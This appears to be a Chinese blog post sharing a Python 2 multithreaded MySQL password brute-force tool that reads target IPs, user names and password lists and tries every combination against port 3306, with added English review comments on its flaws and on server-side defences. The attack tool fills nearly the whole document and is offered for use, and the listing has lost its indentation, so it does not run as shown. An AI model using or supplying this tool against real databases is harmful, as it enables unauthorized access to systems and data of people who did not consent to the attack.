升级自:https://www.waitalone.cn/python-mysql-mult.html
在原基础上增加如下功能:
支持ip批量爆破,只需同目录存在ip.txt文件;
如果输入的目标是域名,将域名添加到用户列表,增加爆破成功率;
去掉了端口和数据库的输入,默认了端口3306和数据库mysql。
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, sys, re, socket, time
from functools import partial
from multiprocessing.dummy import Pool as ThreadPool
# Import guard for the third-party MySQLdb driver: when the import fails the
# script prints a download hint and terminates before anything else runs.
# NOTE(review): the page lost the indentation of this listing; the statements
# below belong inside the try / except bodies.
try:
import MySQLdb
except ImportError:
print '\n[!] MySQLdb模块导入错误,请到下面网址下载:'
print '[!] http://www.codegood.com/archives/129'
exit()
def usage():
    """Print the banner and, on a wrong argument count, the help text.

    The script expects exactly three positional arguments (``len(sys.argv)``
    must be 4): a target or target-list file, a user-name list and a
    password list. With any other count the usage and example lines are
    printed and the process ends through ``sys.exit()``; otherwise the
    function simply returns.
    """
    rule = '+' + '-' * 50 + '+'
    print rule
    print '\t Python MySQL批量爆破工具多线程版'
    print '\t\t Time:2014-11-12'
    print rule
    if len(sys.argv) == 4:
        return
    # Only the file name of the script is shown, not the path it was run from.
    script = os.path.basename(sys.argv[0])
    print "用法: " + script + " 待破解的ip/domain或ip列表 用户名列表 密码列表"
    print "实例: " + script + " www.alin.cn或ip.txt user.txt pass.txt"
    sys.exit()
def mysql_brute(user, password):
    """Make one MySQL login attempt for ``user`` / ``password``.

    The target address is read from the module-level name ``host`` and a
    successful login is recorded in the module-level list ``result``; both
    are set by the script body, not passed in. The connection always goes to
    port 3306 and selects the ``mysql`` schema.

    Every ``MySQLdb.Error`` is reported as a ``[false]`` line, so the output
    does not distinguish a rejected credential from a connection failure.
    Each attempt, successful or not, writes the password in clear text to
    stdout; from the server's side each call is one authentication event,
    which is what login-failure monitoring on the database host will see.
    """
    conn = None
    try:
        conn = MySQLdb.connect(host=host, user=user, passwd=password, db="mysql", port=3306)
        detail = host + '\t用户名:' + user + "\t密码:" + password
        result.append('ip:' + detail)
        print '[true] ip:' + detail + '\n'
    except KeyboardInterrupt:
        # NOTE(review): the script body runs this function through a thread
        # pool, so this handler executes in a worker thread - confirm that
        # Ctrl-C actually reaches it.
        print '大爷,按您的吩咐,已成功退出程序!'
        exit()
    except MySQLdb.Error, err:
        # The exception detail is not used; only the attempted triple is shown.
        print '[false] ' + host+' '+user+':'+password+'\n'
    finally:
        # Close the connection only if connect() returned one.
        if conn:
            conn.close()
# Script body: work out the target list, load the user and password lists,
# run every (host, user, password) combination through mysql_brute() and
# print a summary.
# NOTE(review): the page lost the indentation of this listing. The nesting
# must be restored before the code can run, and where the else branch below
# ends is not recoverable from this page - confirm against the original post.
if __name__ == '__main__':
# Prints the banner; exits here unless exactly three arguments were given.
usage()
start_time = time.time()
# Target handling, three cases on argv[1]. re.match anchors only at the start
# of the string and the octets are not range-checked, so anything that merely
# begins with a dotted quad takes this branch.
if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', sys.argv[1]):
# A single address is written to tmp.txt in the current directory,
# overwriting any file of that name.
with open("tmp.txt","w") as f:
f.write(sys.argv[1])
ips = "tmp.txt"
# A name that starts with word characters followed by ".txt" is taken as the
# path of a target list and read as-is.
elif re.match(r'\w+\.txt',sys.argv[1]):
ips = sys.argv[1]
else:
# Anything else is treated as a host name and resolved once through DNS;
# the resulting address is written to tmp.txt.
with open("tmp.txt","w") as f:
f.write(socket.gethostbyname(sys.argv[1]))
ips = "tmp.txt"
# isExist: some line of the user list contains argv[1].
# isExist1: some line contains argv[1] with its last ".suffix" removed.
# Both are substring tests, not whole-line comparisons.
isExist = 0
isExist1 = 0
with open(sys.argv[2],'r') as tmp:
for line in tmp.readlines():
if sys.argv[1] in line:
isExist = 1
if isExist1 == 1:
break
if re.sub(r'\.\w+$','',sys.argv[1]) in line:
isExist1 = 1
if isExist == 1:
break
# Side effect on the caller's input: the user-list file named in argv[2] is
# opened in append mode and up to two extra lines are added to it on disk.
with open(sys.argv[2],"a") as f:
if isExist == 0:
f.write("\n"+sys.argv[1])
if isExist1 == 0:
f.write("\n"+re.sub(r'\.\w+$','',sys.argv[1]))
# Load the three lists, stripping trailing whitespace from every line. The
# file objects are not closed explicitly.
iplist = [k.rstrip() for k in open(ips)]
userlist = [i.rstrip() for i in open(sys.argv[2])]
passlist = [j.rstrip() for j in open(sys.argv[3])]
print '\n[+] 目 标:%s \n' % sys.argv[1]
print '[+] 用户名:%d 条\n' % len(userlist)
print '[+] 密 码:%d 条\n' % len(passlist)
print '[!] 密码破解中,请稍候……\n'
# Module-level list that mysql_brute() appends successful logins to.
result = []
# "host" is a module-level loop variable that mysql_brute() reads directly.
# For each host and each user a pool of 10 threads is created and mapped over
# the whole password list (presumably closed and joined per user as well -
# the nesting is not visible here). No delay is coded between attempts.
# Seen from the database host this is len(userlist) * len(passlist) login
# attempts per target on TCP 3306, up to 10 at a time, from one source:
# a burst of access-denied errors that failed-login monitoring should alert
# on. Keeping 3306 off untrusted networks, restricting the hosts an account
# may connect from, and per-account lockout or connection throttling (for
# example FAILED_LOGIN_ATTEMPTS / PASSWORD_LOCK_TIME or the connection_control
# plugin, where the server version offers them) limit this kind of guessing.
for host in iplist:
for user in userlist:
partial_user = partial(mysql_brute, user)
pool = ThreadPool(10)
pool.map(partial_user, passlist)
pool.close()
pool.join()
if len(result) != 0:
print '[+] 恭喜大爷,MySQL密码破解成功!\n'
# Using the entries as dict keys removes duplicates before printing.
for x in {}.fromkeys(result).keys():
print x + '\n'
else:
print '[-] 杯具了大爷,MySQL密码破解失败!\n'
# Elapsed wall-clock time, truncated to whole seconds by %d.
print '[+] 破解完成,用时: %d 秒' % (time.time() - start_time)